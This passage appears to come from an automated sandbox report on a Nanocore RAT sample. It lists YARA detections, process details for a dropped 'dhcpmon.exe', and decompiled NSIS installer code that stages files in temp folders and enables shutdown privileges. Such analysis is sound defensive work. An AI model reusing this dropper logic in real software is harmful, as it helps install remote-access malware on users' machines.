              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.323888903.00000000025B0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Chronological Activities

              Analysis Process: dhcpmon.exe PID: 6212 Parent PID: 6752

              General

              Start time:17:21:42
              Start date:08/04/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.339271124.00000000024E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.339201684.0000000002491000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Chronological Activities

              Disassembly

              Code Analysis

              Reset < >

                Analysis Process: bGf2H3tXGg.exe PID: 4656 Parent PID: 5736 bGf2H3tXGg.exeCOMMON

                Executed Functions

                Function 00403348, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366stringcomfileCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f42c = _t42;
				if(_t42 != 6) {
					_t119 = E00406500(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E00406492(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406500(0xb);
				 *0x42f424 = E00406500(9);
				_t47 = E00406500(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f42f =  *0x42f42f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f4f8 = _t47;
				SHGetFileInfoA(0x429850, 0, _t164 + 0x38, 0x160, 0); // executed
				E004060F7("Template Method Pattern Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\alfons\\Desktop\\bGf2H3tXGg.exe\" ";
				E004060F7(_t160, _t51);
				 *0x42f420 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\alfons\\Desktop\\bGf2H3tXGg.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405ABA(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405ABA(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E00403317(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EA1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E00403830();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4d4;
													if( *0x42f4d4 == 0) {
														L67:
														_t63 =  *0x42f4ec;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406500(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405813( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f440 == 0) {
												L42:
												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
												 *(_t164 + 0x18) = E0040390A( *0x42f4ec);
												goto L43;
											}
											_t153 = E00405ABA(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E0040577E(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\alfons\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\alfons\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E00405761();
														} else {
															E004056E4();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t162);
														}
														E004060F7(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
															DeleteFileA(0x429450);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\bGf2H3tXGg.exe", 0x429450, 1) != 0) {
																E00405ED6(_t137, 0x429450, 0);
																E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
																_t94 = E00405796(0x429450);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00405ED6(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405B7D(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
												E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403317(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403317(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f4e0 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                0x00403358
                0x0040335c
                0x00403364
                0x00403368
                0x0040336d
                0x00403379
                0x00403382
                0x00403387
                0x0040338a
                0x00403391
                0x00403398
                0x00403398
                0x00403391
                0x0040339a
                0x0040339f
                0x004033a0
                0x004033ac
                0x004033b0
                0x004033b6
                0x004033c4
                0x004033c9
                0x004033d0
                0x004033d4
                0x004033d8
                0x004033da
                0x004033da
                0x004033d8
                0x004033e2
                0x004033e9
                0x004033ef
                0x00403405
                0x00403415
                0x0040341a
                0x00403420
                0x00403427
                0x00403433
                0x0040343d
                0x0040343f
                0x00403441
                0x00403446
                0x00403446
                0x00403456
                0x0040345c
                0x00403525
                0x00403525
                0x00403527
                0x00403529
                0x00000000
                0x00000000
                0x00403465
                0x00403468
                0x00403470
                0x00403470
                0x00403473
                0x00403478
                0x0040347a
                0x0040347a
                0x0040347b
                0x0040347b
                0x00403480
                0x00403483
                0x00403515
                0x0040351a
                0x0040351f
                0x00403522
                0x00403524
                0x00403524
                0x00403524
                0x00000000
                0x00403489
                0x00403489
                0x0040348a
                0x0040348d
                0x004034a5
                0x004034d0
                0x004034d2
                0x004034e5
                0x00403510
                0x00403513
                0x00403531
                0x00403534
                0x0040353d
                0x00403542
                0x00403548
                0x00403553
                0x00403555
                0x0040355a
                0x0040355c
                0x004035b4
                0x004035b9
                0x004035c3
                0x004035ca
                0x004035ce
                0x00403662
                0x00403662
                0x00403667
                0x0040366d
                0x00403672
                0x00403796
                0x0040379c
                0x00403818
                0x00403818
                0x0040381d
                0x00403820
                0x00403822
                0x00403822
                0x0040382a
                0x0040382a
                0x004037ac
                0x004037b4
                0x004037b6
                0x004037b7
                0x004037c4
                0x004037d7
                0x004037df
                0x004037e3
                0x004037e3
                0x004037eb
                0x004037f0
                0x004037f7
                0x00403805
                0x00403807
                0x0040380d
                0x0040380f
                0x00000000
                0x00000000
                0x00000000
                0x004037f9
                0x004037ff
                0x00403801
                0x00403803
                0x00403811
                0x00403813
                0x00000000
                0x00403813
                0x00000000
                0x00403803
                0x004037f7
                0x00403681
                0x00403688
                0x00403688
                0x004035da
                0x00403652
                0x00403652
                0x0040365e
                0x00000000
                0x0040365e
                0x004035e3
                0x004035e7
                0x0040361d
                0x0040361d
                0x0040361f
                0x00403627
                0x00403699
                0x0040369b
                0x004036a2
                0x004036aa
                0x004036aa
                0x004036b5
                0x004036ba
                0x004036c9
                0x004036cd
                0x004036ce
                0x004036d7
                0x004036d0
                0x004036d0
                0x004036d0
                0x004036dd
                0x004036e3
                0x004036e9
                0x004036f1
                0x004036f1
                0x004036ff
                0x00403704
                0x00403716
                0x0040371e
                0x00403724
                0x00403730
                0x00403736
                0x00403740
                0x00403756
                0x00403767
                0x0040376d
                0x00403774
                0x00403777
                0x0040377d
                0x0040377d
                0x00403774
                0x00403781
                0x00403787
                0x00403787
                0x0040378c
                0x0040378c
                0x00000000
                0x004036c9
                0x00403629
                0x0040362b
                0x00403636
                0x00000000
                0x00000000
                0x0040363e
                0x00403649
                0x0040364e
                0x00000000
                0x0040364e
                0x00403612
                0x00403614
                0x00403618
                0x0040361b
                0x00000000
                0x00000000
                0x00000000
                0x0040361b
                0x00000000
                0x00403614
                0x00403564
                0x00403570
                0x00403575
                0x0040357a
                0x0040357c
                0x00000000
                0x00000000
                0x00403584
                0x0040358c
                0x0040359d
                0x004035a5
                0x004035a7
                0x004035ac
                0x004035ae
                0x00000000
                0x00000000
                0x00000000
                0x004035ae
                0x00000000
                0x00403513
                0x004034d4
                0x004034d7
                0x004034da
                0x004034e0
                0x004034e0
                0x004034e0
                0x004034e0
                0x00000000
                0x004034e0
                0x004034dc
                0x004034de
                0x00000000
                0x00000000
                0x00000000
                0x004034de
                0x0040348f
                0x00403492
                0x00403495
                0x0040349b
                0x0040349b
                0x00000000
                0x0040349b
                0x00403497
                0x00403499
                0x00000000
                0x00000000
                0x00000000
                0x00403499
                0x00000000
                0x00000000
                0x00000000
                0x0040346a
                0x0040346a
                0x0040346a
                0x0040346b
                0x0040346b
                0x00000000
                0x0040346a
                0x00000000

                APIs
                • SetErrorMode.KERNELBASE ref: 0040336D
                • GetVersion.KERNEL32 ref: 00403373
                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                • OleInitialize.OLE32(00000000), ref: 004033E9
                • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                • GetCommandLineA.KERNEL32(Template Method Pattern Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000020,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                  • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                  • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                  • Part of subcall function 0040390A: GetUserDefaultUILanguage.KERNELBASE(00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000000), ref: 00403924
                  • Part of subcall function 0040390A: lstrlenA.KERNEL32(Cgrlcpdlsle,?,?,?,Cgrlcpdlsle,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90), ref: 004039FA
                  • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,Cgrlcpdlsle,?,?,?,Cgrlcpdlsle,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                  • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Cgrlcpdlsle), ref: 00403A18
                  • Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
                  • Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E
                  • Part of subcall function 00403830: CloseHandle.KERNEL32(000002BC,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                • ExitProcess.KERNEL32 ref: 00403688
                • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                • ExitWindowsEx.USER32 ref: 00403807
                • ExitProcess.KERNEL32 ref: 0040382A
                  • Part of subcall function 00405813: MessageBoxIndirectA.USER32 ref: 0040586E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                • String ID: "$"C:\Users\user\Desktop\bGf2H3tXGg.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\bGf2H3tXGg.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Template Method Pattern Setup$UXTHEME$\Temp$~nsu
                • API String ID: 1314998376-3452680007
                • Opcode ID: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                • Opcode Fuzzy Hash: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004058BF, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405B7D(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4c8 =  *0x42f4c8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E004060F7(0x42b898, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405AD6(_t73);
					} else {
						lstrcatA(0x42b898, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b898,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E004060F7(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
